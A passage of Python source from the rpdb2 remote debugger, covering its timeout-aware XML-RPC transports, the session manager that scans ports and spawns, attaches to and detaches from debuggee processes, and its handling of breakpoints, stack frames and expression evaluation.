self.sock = socket.socket(af, socktype, proto)
self.sock.settimeout(self._rpdb2_timeout)
if self.debuglevel > 0:
print_debug("connect: (%s, %s)" % (self.host, self.port))
self.sock.connect(sa)
except socket.error:
msg = sys.exc_info()[1]
if self.debuglevel > 0:
print_debug('connect fail: ' + repr((self.host, self.port)))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error(msg)
#
# MOD
#
class CLocalTimeoutHTTPConnection(CTimeoutHTTPConnection):
"""
Modification of httplib.HTTPConnection with timeout for sockets.
"""
_rpdb2_timeout = LOCAL_TIMEOUT
if is_py3k():
class httplib_HTTP(object):
pass
else:
httplib_HTTP = httplib.HTTP
#
# MOD
#
class CTimeoutHTTP(httplib_HTTP):
"""
Modification of httplib.HTTP with timeout for sockets.
"""
_connection_class = CTimeoutHTTPConnection
#
# MOD
#
class CLocalTimeoutHTTP(httplib_HTTP):
"""
Modification of httplib.HTTP with timeout for sockets.
"""
_connection_class = CLocalTimeoutHTTPConnection
#
# MOD
#
class CLocalTransport(xmlrpclib.Transport):
"""
Modification of xmlrpclib.Transport to work around Zonealarm sockets
bug.
"""
_connection_class = httplib.HTTPConnection
_connection_class_old = httplib_HTTP
def make_connection(self, host):
# New Python version of connect().
# However, make_connection is hacked to always create a new connection
# Otherwise all threads use single connection and crash.
if hasattr(self, '_connection'):
chost, self._extra_headers, x509 = self.get_host_info(host)
return self._connection_class(chost)
# Old Python version of connect().
# create a HTTP connection object from a host descriptor
host, extra_headers, x509 = self.get_host_info(host)
return self._connection_class_old(host)
def __parse_response(self, file, sock):
# read response from input file/socket, and parse it
p, u = self.getparser()
while 1:
if sock:
response = sock.recv(1024)
else:
time.sleep(0.002)
response = file.read(1024)
if not response:
break
if self.verbose:
_print("body: " + repr(response))
p.feed(response)
file.close()
p.close()
return u.close()
if os.name == 'nt':
_parse_response = __parse_response
#
# MOD
#
class CTimeoutTransport(CLocalTransport):
"""
Modification of xmlrpclib.Transport with timeout for sockets.
"""
_connection_class = CTimeoutHTTPConnection
_connection_class_old = CTimeoutHTTP
#
# MOD
#
class CLocalTimeoutTransport(CLocalTransport):
"""
Modification of xmlrpclib.Transport with timeout for sockets.
"""
_connection_class = CLocalTimeoutHTTPConnection
_connection_class_old = CLocalTimeoutHTTP
class CSession:
"""
Basic class that communicates with the debuggee server.
"""
def __init__(self, host, port, _rpdb2_pwd, fAllowUnencrypted, rid):
self.m_crypto = CCrypto(_rpdb2_pwd, fAllowUnencrypted, rid)
self.m_host = host
self.m_port = port
self.m_proxy = None
self.m_server_info = None
self.m_exc_info = None
self.m_fShutDown = False
self.m_fRestart = False
def get_encryption(self):
return self.m_proxy.get_encryption()
def getServerInfo(self):
return self.m_server_info
def pause(self):
self.m_fRestart = True
def restart(self, sleep = 0, timeout = 10):
self.m_fRestart = True
time.sleep(sleep)
t0 = time.time()
try:
try:
while time.time() < t0 + timeout:
try:
self.Connect()
return
except socket.error:
continue
raise CConnectionException
except:
self.m_fShutDown = True
raise
finally:
self.m_fRestart = False
def shut_down(self):
self.m_fShutDown = True
def getProxy(self):
"""
Return the proxy object.
With this object you can invoke methods on the server.
"""
while self.m_fRestart:
time.sleep(0.1)
if self.m_fShutDown:
raise NotAttached
return self.m_proxy
def ConnectAsync(self):
t = threading.Thread(target = self.ConnectNoThrow)
#thread_set_daemon(t, True)
t.start()
return t
def ConnectNoThrow(self):
try:
self.Connect()
except:
self.m_exc_info = sys.exc_info()
def Connect(self):
host = self.m_host
if host.lower() == LOCALHOST:
host = LOOPBACK
server = CPwdServerProxy(self.m_crypto, calcURL(host, self.m_port), CTimeoutTransport())
server_info = server.server_info()
self.m_proxy = CPwdServerProxy(self.m_crypto, calcURL(host, self.m_port), CLocalTransport(), target_rid = server_info.m_rid)
self.m_server_info = server_info
def isConnected(self):
return self.m_proxy is not None
class CServerList:
def __init__(self, host):
self.m_host = host
self.m_list = []
self.m_errors = {}
def calcList(self, _rpdb2_pwd, rid, key = None):
sil = []
sessions = []
self.m_errors = {}
port = SERVER_PORT_RANGE_START
while port < SERVER_PORT_RANGE_START + SERVER_PORT_RANGE_LENGTH:
s = CSession(self.m_host, port, _rpdb2_pwd, fAllowUnencrypted = True, rid = rid)
t = s.ConnectAsync()
sessions.append((s, t))
port += 1
for (s, t) in sessions:
t.join()
if (s.m_exc_info is not None):
if not issubclass(s.m_exc_info[0], socket.error):
self.m_errors.setdefault(s.m_exc_info[0], []).append(s.m_exc_info)
continue
si = s.getServerInfo()
if si is not None:
sil.append((-si.m_age, si))
sil.sort()
self.m_list = [s[1] for s in sil]
if key != None:
try:
return self.findServers(key)[0]
except:
pass
if key != None:
raise UnknownServer
sil.sort()
self.m_list = [s[1] for s in sil]
return self.m_list
def get_errors(self):
return self.m_errors
def findServers(self, key):
try:
n = int(key)
_s = [s for s in self.m_list if (s.m_pid == n) or (s.m_rid == key)]
except ValueError:
key = as_string(key, sys.getfilesystemencoding())
_s = [s for s in self.m_list if key in s.m_filename]
if _s == []:
raise UnknownServer
return _s
class CSessionManagerInternal:
def __init__(self, _rpdb2_pwd, fAllowUnencrypted, fAllowRemote, host):
self.m_rpdb2_pwd = [_rpdb2_pwd, None][_rpdb2_pwd in [None, '']]
self.m_fAllowUnencrypted = fAllowUnencrypted
self.m_fAllowRemote = fAllowRemote
self.m_rid = generate_rid()
self.m_host = host
self.m_server_list_object = CServerList(host)
self.m_session = None
self.m_server_info = None
self.m_worker_thread = None
self.m_worker_thread_ident = None
self.m_fStop = False
self.m_stack_depth = None
self.m_stack_depth_exception = None
self.m_frame_index = 0
self.m_frame_index_exception = 0
self.m_completions = {}
self.m_remote_event_index = 0
self.m_event_dispatcher_proxy = CEventDispatcher()
self.m_event_dispatcher = CEventDispatcher(self.m_event_dispatcher_proxy)
self.m_state_manager = CStateManager(STATE_DETACHED, self.m_event_dispatcher, self.m_event_dispatcher_proxy)
self.m_breakpoints_proxy = CBreakPointsManagerProxy(self)
event_type_dict = {CEventState: {EVENT_EXCLUDE: [STATE_BROKEN, STATE_ANALYZE]}}
self.register_callback(self.reset_frame_indexes, event_type_dict, fSingleUse = False)
event_type_dict = {CEventStackDepth: {}}
self.register_callback(self.set_stack_depth, event_type_dict, fSingleUse = False)
event_type_dict = {CEventNoThreads: {}}
self.register_callback(self._reset_frame_indexes, event_type_dict, fSingleUse = False)
event_type_dict = {CEventExit: {}}
self.register_callback(self.on_event_exit, event_type_dict, fSingleUse = False)
event_type_dict = {CEventConflictingModules: {}}
self.register_callback(self.on_event_conflicting_modules, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSignalIntercepted: {}}
self.register_callback(self.on_event_signal_intercept, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSignalException: {}}
self.register_callback(self.on_event_signal_exception, event_type_dict, fSingleUse = False)
event_type_dict = {CEventEmbeddedSync: {}}
self.register_callback(self.on_event_embedded_sync, event_type_dict, fSingleUse = False)
event_type_dict = {CEventSynchronicity: {}}
self.m_event_dispatcher_proxy.register_callback(self.on_event_synchronicity, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
event_type_dict = {CEventTrap: {}}
self.m_event_dispatcher_proxy.register_callback(self.on_event_trap, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
event_type_dict = {CEventForkMode: {}}
self.m_event_dispatcher_proxy.register_callback(self.on_event_fork_mode, event_type_dict, fSingleUse = False)
self.m_event_dispatcher.register_chain_override(event_type_dict)
self.m_printer = self.__nul_printer
self.m_last_command_line = None
self.m_last_fchdir = None
self.m_fsynchronicity = True
self.m_ftrap = True
self.m_ffork_into_child = False
self.m_ffork_auto = False
self.m_environment = []
self.m_encoding = ENCODING_AUTO
self.m_fraw = False
def shutdown(self):
self.m_event_dispatcher_proxy.shutdown()
self.m_event_dispatcher.shutdown()
self.m_state_manager.shutdown()
def __nul_printer(self, _str):
pass
def set_printer(self, printer):
self.m_printer = printer
def register_callback(self, callback, event_type_dict, fSingleUse):
return self.m_event_dispatcher.register_callback(callback, event_type_dict, fSingleUse)
def remove_callback(self, callback):
return self.m_event_dispatcher.remove_callback(callback)
def __wait_for_debuggee(self, rid):
try:
time.sleep(STARTUP_TIMEOUT / 2)
for i in range(STARTUP_RETRIES):
try:
print_debug('Scanning for debuggee...')
t0 = time.time()
return self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid, rid)
except UnknownServer:
dt = time.time() - t0
if dt < STARTUP_TIMEOUT:
time.sleep(STARTUP_TIMEOUT - dt)
continue
return self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid, rid)
finally:
errors = self.m_server_list_object.get_errors()
self.__report_server_errors(errors, fsupress_pwd_warning = True)
def get_encryption(self):
return self.getSession().get_encryption()
def launch(self, fchdir, command_line, fload_breakpoints = True):
assert(is_unicode(command_line))
self.__verify_unattached()
if not os.name in [POSIX, 'nt']:
self.m_printer(STR_SPAWN_UNSUPPORTED)
raise SpawnUnsupported
if g_fFirewallTest:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
else:
print_debug('Skipping firewall test.')
if self.m_rpdb2_pwd is None:
self.set_random_password()
if command_line == '':
raise BadArgument
(path, filename, args) = split_command_line_path_filename_args(command_line)
#if not IsPythonSourceFile(filename):
# raise NotPythonSource
_filename = my_os_path_join(path, filename)
ExpandedFilename = FindFile(_filename)
self.set_host(LOCALHOST)
self.m_printer(STR_STARTUP_SPAWN_NOTICE)
rid = generate_rid()
create_pwd_file(rid, self.m_rpdb2_pwd)
self.m_state_manager.set_state(STATE_SPAWNING)
try:
try:
self._spawn_server(fchdir, ExpandedFilename, args, rid)
server = self.__wait_for_debuggee(rid)
self.attach(server.m_rid, server.m_filename, fsupress_pwd_warning = True, fsetenv = True, ffirewall_test = False, server = server, fload_breakpoints = fload_breakpoints)
self.m_last_command_line = command_line
self.m_last_fchdir = fchdir
except:
if self.m_state_manager.get_state() != STATE_DETACHED:
self.m_state_manager.set_state(STATE_DETACHED)
raise
finally:
delete_pwd_file(rid)
def restart(self):
"""
Restart debug session with same command_line and fchdir arguments
which were used in last launch.
"""
if None in (self.m_last_fchdir, self.m_last_command_line):
return
if self.m_state_manager.get_state() != STATE_DETACHED:
self.stop_debuggee()
self.launch(self.m_last_fchdir, self.m_last_command_line)
def get_launch_args(self):
"""
Return command_line and fchdir arguments which were used in last
launch as (last_fchdir, last_command_line).
Returns None if there is no info.
"""
if None in (self.m_last_fchdir, self.m_last_command_line):
return (None, None)
return (self.m_last_fchdir, self.m_last_command_line)
def _spawn_server(self, fchdir, ExpandedFilename, args, rid):
"""
Start an OS console to act as server.
What it does is to start rpdb again in a new console in server only mode.
"""
if g_fScreen:
name = SCREEN
elif sys.platform == DARWIN:
name = DARWIN
else:
try:
import terminalcommand
name = MAC
except:
name = os.name
if name == 'nt' and g_fDebug:
name = NT_DEBUG
e = ['', ' --encrypt'][not self.m_fAllowUnencrypted]
r = ['', ' --remote'][self.m_fAllowRemote]
c = ['', ' --chdir'][fchdir]
p = ['', ' --pwd="%s"' % self.m_rpdb2_pwd][os.name == 'nt']
b = ''
encoding = detect_locale()
fse = sys.getfilesystemencoding()
ExpandedFilename = g_found_unicode_files.get(ExpandedFilename, ExpandedFilename)
ExpandedFilename = as_unicode(ExpandedFilename, fse)
if as_bytes('?') in as_bytes(ExpandedFilename, encoding, fstrict = False):
_u = as_bytes(ExpandedFilename)
_b = base64.encodestring(_u)
_b = _b.strip(as_bytes('\n')).translate(g_safe_base64_to)
_b = as_string(_b, fstrict = True)
b = ' --base64=%s' % _b
debugger = os.path.abspath(__file__)
if debugger[-1:] == 'c':
debugger = debugger[:-1]
debugger = as_unicode(debugger, fse)
debug_prints = ['', ' --debug'][g_fDebug]
options = '"%s"%s --debugee%s%s%s%s%s --rid=%s "%s" %s' % (debugger, debug_prints, p, e, r, c, b, rid, ExpandedFilename, args)
python_exec = sys.executable
if python_exec.endswith('w.exe'):
python_exec = python_exec[:-5] + '.exe'
python_exec = as_unicode(python_exec, fse)
if as_bytes('?') in as_bytes(python_exec + debugger, encoding, fstrict = False):
raise BadMBCSPath
if name == POSIX:
shell = CalcUserShell()
terminal_command = CalcTerminalCommand()
if terminal_command in osSpawn:
command = osSpawn[terminal_command] % {'shell': shell, 'exec': python_exec, 'options': options}
else:
command = osSpawn[name] % {'term': terminal_command, 'shell': shell, 'exec': python_exec, 'options': options}
else:
command = osSpawn[name] % {'exec': python_exec, 'options': options}
if name == DARWIN:
s = 'cd "%s" ; %s' % (getcwdu(), command)
command = CalcMacTerminalCommand(s)
print_debug('Terminal open string: %s' % repr(command))
command = as_string(command, encoding)
if name == MAC:
terminalcommand.run(command)
else:
subprocess.Popen(command, shell=True)
def attach(self, key, name = None, fsupress_pwd_warning = False, fsetenv = False, ffirewall_test = True, server = None, fload_breakpoints = True):
assert(is_unicode(key))
self.__verify_unattached()
if key == '':
raise BadArgument
if self.m_rpdb2_pwd is None:
#self.m_printer(STR_PASSWORD_MUST_BE_SET)
raise UnsetPassword
if g_fFirewallTest and ffirewall_test:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
elif not g_fFirewallTest and ffirewall_test:
print_debug('Skipping firewall test.')
if name is None:
name = key
_name = name
self.m_printer(STR_STARTUP_NOTICE)
self.m_state_manager.set_state(STATE_ATTACHING)
try:
servers = [server]
if server == None:
self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid)
servers = self.m_server_list_object.findServers(key)
server = servers[0]
_name = server.m_filename
errors = self.m_server_list_object.get_errors()
if not key in [server.m_rid, str(server.m_pid)]:
self.__report_server_errors(errors, fsupress_pwd_warning)
self.__attach(server, fsetenv)
if len(servers) > 1:
self.m_printer(STR_MULTIPLE_DEBUGGEES % key)
self.m_printer(STR_ATTACH_CRYPTO_MODE % ([' ' + STR_ATTACH_CRYPTO_MODE_NOT, ''][self.get_encryption()]))
self.m_printer(STR_ATTACH_SUCCEEDED % server.m_filename)
try:
if fload_breakpoints:
self.load_breakpoints()
except:
pass
except (socket.error, CConnectionException):
self.m_printer(STR_ATTACH_FAILED_NAME % _name)
self.m_state_manager.set_state(STATE_DETACHED)
raise
except:
print_debug_exception()
assert False
def report_exception(self, _type, value, tb):
msg = g_error_mapping.get(_type, STR_ERROR_OTHER)
if _type == SpawnUnsupported and os.name == POSIX and not g_fScreen and g_fDefaultStd:
msg += ' ' + STR_SPAWN_UNSUPPORTED_SCREEN_SUFFIX
if _type == UnknownServer and os.name == POSIX and not g_fScreen and g_fDefaultStd:
msg += ' ' + STR_DISPLAY_ERROR
_str = msg % {'type': _type, 'value': value, 'traceback': tb}
self.m_printer(_str)
if not _type in g_error_mapping:
print_exception(_type, value, tb, True)
def __report_server_errors(self, errors, fsupress_pwd_warning = False):
for k, el in errors.items():
if fsupress_pwd_warning and k in [BadVersion, AuthenticationBadData, AuthenticationFailure]:
continue
if k in [BadVersion]:
for (t, v, tb) in el:
self.report_exception(t, v, None)
continue
(t, v, tb) = el[0]
self.report_exception(t, v, tb)
def __attach(self, server, fsetenv):
self.__verify_unattached()
session = CSession(self.m_host, server.m_port, self.m_rpdb2_pwd, self.m_fAllowUnencrypted, self.m_rid)
session.Connect()
if (session.getServerInfo().m_pid != server.m_pid) or (session.getServerInfo().m_filename != server.m_filename):
raise UnexpectedData
self.m_session = session
self.m_server_info = self.get_server_info()
self.getSession().getProxy().set_synchronicity(self.m_fsynchronicity)
self.getSession().getProxy().set_trap_unhandled_exceptions(self.m_ftrap)
self.getSession().getProxy().set_fork_mode(self.m_ffork_into_child, self.m_ffork_auto)
if fsetenv and len(self.m_environment) != 0:
self.getSession().getProxy().set_environ(self.m_environment)
self.request_break()
self.refresh(True)
self.__start_event_monitor()
print_debug('Attached to debuggee on port %d.' % session.m_port)
#self.enable_breakpoint([], fAll = True)
def __verify_unattached(self):
if self.__is_attached():
raise AlreadyAttached
def __verify_attached(self):
if not self.__is_attached():
raise NotAttached
def __is_attached(self):
return (self.m_state_manager.get_state() != STATE_DETACHED) and (self.m_session is not None)
def __verify_broken(self):
if self.m_state_manager.get_state() not in [STATE_BROKEN, STATE_ANALYZE]:
raise DebuggerNotBroken
def refresh(self, fSendUnhandled = False):
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
self.m_remote_event_index = self.getSession().getProxy().sync_with_events(fAnalyzeMode, fSendUnhandled)
self.m_breakpoints_proxy.sync()
def __start_event_monitor(self):
self.m_fStop = False
self.m_worker_thread = threading.Thread(target = self.__event_monitor_proc)
#thread_set_daemon(self.m_worker_thread, True)
self.m_worker_thread.start()
def __event_monitor_proc(self):
self.m_worker_thread_ident = thread.get_ident()
t = 0
nfailures = 0
while not self.m_fStop:
try:
t = ControlRate(t, IDLE_MAX_RATE)
if self.m_fStop:
return
(n, sel) = self.getSession().getProxy().wait_for_event(PING_TIMEOUT, self.m_remote_event_index)
if True in [isinstance(e, CEventForkSwitch) for e in sel]:
print_debug('Received fork switch event.')
self.getSession().pause()
threading.Thread(target = self.restart_session_job).start()
if True in [isinstance(e, CEventExecSwitch) for e in sel]:
print_debug('Received exec switch event.')
self.getSession().pause()
threading.Thread(target = self.restart_session_job, args = (True, )).start()
if True in [isinstance(e, CEventExit) for e in sel]:
self.getSession().shut_down()
self.m_fStop = True
if n > self.m_remote_event_index:
#print >> sys.__stderr__, (n, sel)
self.m_remote_event_index = n
self.m_event_dispatcher_proxy.fire_events(sel)
nfailures = 0
except CConnectionException:
if not self.m_fStop:
self.report_exception(*sys.exc_info())
threading.Thread(target = self.detach_job).start()
return
except socket.error:
if nfailures < COMMUNICATION_RETRIES:
nfailures += 1
continue
if not self.m_fStop:
self.report_exception(*sys.exc_info())
threading.Thread(target = self.detach_job).start()
return
def on_event_conflicting_modules(self, event):
s = ', '.join(event.m_modules_list)
self.m_printer(STR_CONFLICTING_MODULES % s)
def on_event_signal_intercept(self, event):
if self.m_state_manager.get_state() in [STATE_ANALYZE, STATE_BROKEN]:
self.m_printer(STR_SIGNAL_INTERCEPT % (event.m_signame, event.m_signum))
def on_event_signal_exception(self, event):
self.m_printer(STR_SIGNAL_EXCEPTION % (event.m_description, event.m_signame, event.m_signum))
def on_event_embedded_sync(self, event):
#
# time.sleep() allows pending break requests to go through...
#
time.sleep(0.001)
self.getSession().getProxy().embedded_sync()
def on_event_exit(self, event):
self.m_printer(STR_DEBUGGEE_TERMINATED)
threading.Thread(target = self.detach_job).start()
def restart_session_job(self, fSendExitOnFailure = False):
try:
self.getSession().restart(sleep = 3)
return
except:
pass
self.m_fStop = True
if fSendExitOnFailure:
e = CEventExit()
self.m_event_dispatcher_proxy.fire_event(e)
return
self.m_printer(STR_LOST_CONNECTION)
self.detach_job()
def detach_job(self):
try:
self.detach()
except:
pass
def detach(self):
self.__verify_attached()
try:
self.save_breakpoints()
except:
print_debug_exception()
pass
self.m_printer(STR_ATTEMPTING_TO_DETACH)
self.m_state_manager.set_state(STATE_DETACHING)
self.__stop_event_monitor()
try:
#self.disable_breakpoint([], fAll = True)
try:
self.getSession().getProxy().set_trap_unhandled_exceptions(False)
self.request_go(fdetach = True)
except DebuggerNotBroken:
pass
finally:
self.m_state_manager.set_state(STATE_DETACHED)
self.m_session = None
self.m_printer(STR_DETACH_SUCCEEDED)
def __stop_event_monitor(self):
self.m_fStop = True
if self.m_worker_thread is not None:
if thread.get_ident() != self.m_worker_thread_ident:
try:
self.getSession().getProxy().null()
except:
pass
self.m_worker_thread.join()
self.m_worker_thread = None
self.m_worker_thread_ident = None
def request_break(self):
self.getSession().getProxy().request_break()
def request_go(self, fdetach = False):
self.getSession().getProxy().request_go(fdetach)
def request_go_breakpoint(self, filename, scope, lineno):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
self.getSession().getProxy().request_go_breakpoint(filename, scope, lineno, frame_index, fAnalyzeMode)
def request_step(self):
self.getSession().getProxy().request_step()
def request_next(self):
self.getSession().getProxy().request_next()
def request_return(self):
self.getSession().getProxy().request_return()
def request_jump(self, lineno):
self.getSession().getProxy().request_jump(lineno)
def set_breakpoint(self, filename, scope, lineno, fEnabled, expr, encoding = None):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
if encoding == None:
encoding = self.m_encoding
self.getSession().getProxy().set_breakpoint(filename, scope, lineno, fEnabled, expr, frame_index, fAnalyzeMode, encoding)
def disable_breakpoint(self, id_list, fAll):
self.getSession().getProxy().disable_breakpoint(id_list, fAll)
def enable_breakpoint(self, id_list, fAll):
self.getSession().getProxy().enable_breakpoint(id_list, fAll)
def delete_breakpoint(self, id_list, fAll):
self.getSession().getProxy().delete_breakpoint(id_list, fAll)
def get_breakpoints(self):
self.__verify_attached()
bpl = self.m_breakpoints_proxy.get_breakpoints()
return bpl
def save_breakpoints(self, filename = ''):
self.__verify_attached()
module_name = self.getSession().getServerInfo().m_module_name
if module_name[:1] == '<':
return
if sys.platform == 'OpenVMS':
#
# OpenVMS filesystem does not support byte stream.
#
mode = 'w'
else:
mode = 'wb'
path = calc_bpl_filename(module_name + filename)
file = open(path, mode)
try:
try:
bpl = self.get_breakpoints()
sbpl = pickle.dumps(bpl)
file.write(sbpl)
except:
print_debug_exception()
raise CException
finally:
file.close()
def load_breakpoints(self, filename = ''):
self.__verify_attached()
module_name = self.getSession().getServerInfo().m_module_name
if module_name[:1] == '<':
return
if sys.platform == 'OpenVMS':
#
# OpenVMS filesystem does not support byte stream.
#
mode = 'r'
else:
mode = 'rb'
path = calc_bpl_filename(module_name + filename)
file = open(path, mode)
ferror = False
try:
try:
bpl = pickle.load(file)
self.delete_breakpoint([], True)
except:
print_debug_exception()
raise CException
#
# No Breakpoints were found in file.
#
if filename == '' and len(bpl.values()) == 0:
raise IOError
for bp in bpl.values():
try:
if bp.m_scope_fqn != None:
bp.m_scope_fqn = as_unicode(bp.m_scope_fqn)
if bp.m_filename != None:
bp.m_filename = as_unicode(bp.m_filename)
if bp.m_expr != None:
bp.m_expr = as_unicode(bp.m_expr)
if bp.m_expr in [None, '']:
bp.m_encoding = as_unicode('utf-8')
self.set_breakpoint(bp.m_filename, bp.m_scope_fqn, bp.m_scope_offset, bp.m_fEnabled, bp.m_expr, bp.m_encoding)
except:
print_debug_exception()
ferror = True
if ferror:
raise CException
finally:
file.close()
def on_event_synchronicity(self, event):
ffire = self.m_fsynchronicity != event.m_fsynchronicity
self.m_fsynchronicity = event.m_fsynchronicity
if ffire:
event = CEventSynchronicity(event.m_fsynchronicity)
self.m_event_dispatcher.fire_event(event)
def set_synchronicity(self, fsynchronicity):
self.m_fsynchronicity = fsynchronicity
if self.__is_attached():
try:
self.getSession().getProxy().set_synchronicity(fsynchronicity)
except NotAttached:
pass
event = CEventSynchronicity(fsynchronicity)
self.m_event_dispatcher.fire_event(event)
def get_synchronicity(self):
return self.m_fsynchronicity
def on_event_trap(self, event):
ffire = self.m_ftrap != event.m_ftrap
self.m_ftrap = event.m_ftrap
if ffire:
event = CEventTrap(event.m_ftrap)
self.m_event_dispatcher.fire_event(event)
def set_trap_unhandled_exceptions(self, ftrap):
self.m_ftrap = ftrap
if self.__is_attached():
try:
self.getSession().getProxy().set_trap_unhandled_exceptions(self.m_ftrap)
except NotAttached:
pass
event = CEventTrap(ftrap)
self.m_event_dispatcher.fire_event(event)
def get_trap_unhandled_exceptions(self):
return self.m_ftrap
def is_unhandled_exception(self):
self.__verify_attached()
return self.getSession().getProxy().is_unhandled_exception()
def on_event_fork_mode(self, event):
ffire = ((self.m_ffork_into_child , self.m_ffork_auto) !=
(event.m_ffork_into_child, event.m_ffork_auto))
self.m_ffork_into_child = event.m_ffork_into_child
self.m_ffork_auto = event.m_ffork_auto
if ffire:
event = CEventForkMode(self.m_ffork_into_child, self.m_ffork_auto)
self.m_event_dispatcher.fire_event(event)
def set_fork_mode(self, ffork_into_child, ffork_auto):
self.m_ffork_into_child = ffork_into_child
self.m_ffork_auto = ffork_auto
if self.__is_attached():
try:
self.getSession().getProxy().set_fork_mode(
self.m_ffork_into_child,
self.m_ffork_auto
)
except NotAttached:
pass
event = CEventForkMode(ffork_into_child, ffork_auto)
self.m_event_dispatcher.fire_event(event)
def get_fork_mode(self):
return (self.m_ffork_into_child, self.m_ffork_auto)
def get_stack(self, tid_list, fAll):
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_stack(tid_list, fAll, fAnalyzeMode)
return r
def get_source_file(self, filename, lineno, nlines):
assert(is_unicode(filename))
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_source_file(filename, lineno, nlines, frame_index, fAnalyzeMode)
return r
def get_source_lines(self, nlines, fAll):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_source_lines(nlines, fAll, frame_index, fAnalyzeMode)
return r
def get_thread_list(self):
(current_thread_id, thread_list) = self.getSession().getProxy().get_thread_list()
return (current_thread_id, thread_list)
def set_thread(self, tid):
self.reset_frame_indexes(None)
self.getSession().getProxy().set_thread(tid)
def get_namespace(self, nl, filter_level, repr_limit):
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
r = self.getSession().getProxy().get_namespace(nl, filter_level, frame_index, fAnalyzeMode, repr_limit, self.m_encoding, self.m_fraw)
return r
def evaluate(self, expr, fclear_completions = True):
assert(is_unicode(expr))
self.__verify_attached()
self.__verify_broken()
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
(value, warning, error) = self.getSession().getProxy().evaluate(expr, frame_index, fAnalyzeMode, self.m_encoding, self.m_fraw)
if fclear_completions:
self.m_completions.clear()
return (value, warning, error)
def execute(self, suite):
assert(is_unicode(suite))
self.__verify_attached()
self.__verify_broken()
frame_index = self.get_frame_index()
fAnalyzeMode = (self.m_state_manager.get_state() == STATE_ANALYZE)
(warning, error) = self.getSession().getProxy().execute(suite, frame_index, fAnalyzeMode, self.m_encoding)
self.m_completions.clear()
return (warning, error)
def set_encoding(self, encoding, fraw):
if (self.m_encoding, self.m_fraw) == (encoding, fraw):
return
self.m_encoding = encoding
self.m_fraw = fraw
event = CEventEncoding(encoding, fraw)
self.m_event_dispatcher.fire_event(event)
if self.__is_attached():
self.refresh()
def get_encoding(self):
return (self.m_encoding, self.m_fraw)
def set_host(self, host):
self.__verify_unattached()
try:
if not is_unicode(host):
host = host.decode('ascii')
host.encode('ascii')
except:
raise BadArgument
host = as_string(host, 'ascii')
try:
socket.getaddrinfo(host, 0, 0, socket.SOCK_STREAM)
except socket.gaierror:
if host.lower() != LOCALHOST:
raise
#
# Work-around for gaierror: (-8, 'Servname not supported for ai_socktype')
#
return self.set_host(LOOPBACK)
self.m_host = host
self.m_server_list_object = CServerList(host)
def get_host(self):
return as_unicode(self.m_host)
def calc_server_list(self):
if self.m_rpdb2_pwd is None:
raise UnsetPassword
if g_fFirewallTest:
firewall_test = CFirewallTest(self.get_remote())
if not firewall_test.run():
raise FirewallBlock
else:
print_debug('Skipping firewall test.')
server_list = self.m_server_list_object.calcList(self.m_rpdb2_pwd, self.m_rid)
errors = self.m_server_list_object.get_errors()
self.__report_server_errors(errors)
return (server_list, errors)
def get_server_info(self):
return self.getSession().getServerInfo()
def complete_expression(self, expr):
match = re.search(
r'(?P<unsupported> \.)? (?P<match> ((?P<scope> (\w+\.)* \w+) \.)? (?P<complete>\w*) $)',
expr,
re.U | re.X
)
if match == None:
raise BadArgument
d = match.groupdict()
unsupported, scope, complete = (d['unsupported'], d['scope'], d['complete'])
if unsupported != None:
raise BadArgument
if scope == None:
_scope = as_unicode('list(globals().keys()) + list(locals().keys()) + list(_RPDB2_builtins.keys())')
else:
_scope = as_unicode('dir(%s)' % scope)
if not _scope in self.m_completions:
(v, w, e) = self.evaluate(_scope, fclear_completions = False)
if w != '' or e != '':
print_debug('evaluate() returned the following warning/error: %s' % w + e)
return (expr, [])
cl = list(set(eval(v)))
if '_RPDB2_builtins' in cl:
cl.remove('_RPDB2_builtins')
self.m_completions[_scope] = cl
completions = [attr for attr in self.m_completions[_scope] if attr.startswith(complete)]
completions.sort()
if complete == '':
prefix = expr
else:
prefix = expr[:-len(complete)]
return (prefix, completions)
def _reset_frame_indexes(self, event):
self.reset_frame_indexes(None)
def reset_frame_indexes(self, event):
try:
self.m_state_manager.acquire()
if event is None:
self.__verify_broken()
elif self.m_state_manager.get_state() in [STATE_BROKEN, STATE_ANALYZE]:
return
self.m_stack_depth = None
self.m_stack_depth_exception = None
self.m_frame_index = 0
self.m_frame_index_exception = 0
self.m_completions.clear()
finally:
self.m_state_manager.release()
def set_stack_depth(self, event):
try:
self.m_state_manager.acquire()
self.__verify_broken()
self.m_stack_depth = event.m_stack_depth
self.m_stack_depth_exception = event.m_stack_depth_exception
self.m_frame_index = min(self.m_frame_index, self.m_stack_depth - 1)
self.m_frame_index_exception = min(self.m_frame_index_exception, self.m_stack_depth_exception - 1)
finally:
self.m_state_manager.release()
def set_frame_index(self, frame_index):
try:
self.m_state_manager.acquire()
self.__verify_broken()
if (frame_index < 0) or (self.m_stack_depth is None):
return self.get_frame_index(fLock = False)
if self.m_state_manager.get_state() == STATE_ANALYZE:
self.m_frame_index_exception = min(frame_index, self.m_stack_depth_exception - 1)
si = self.m_frame_index_exception
else:
self.m_frame_index = min(frame_index, self.m_stack_depth - 1)
si = self.m_frame_index
finally:
self.m_state_manager.release()
event = CEventStackFrameChange(si)
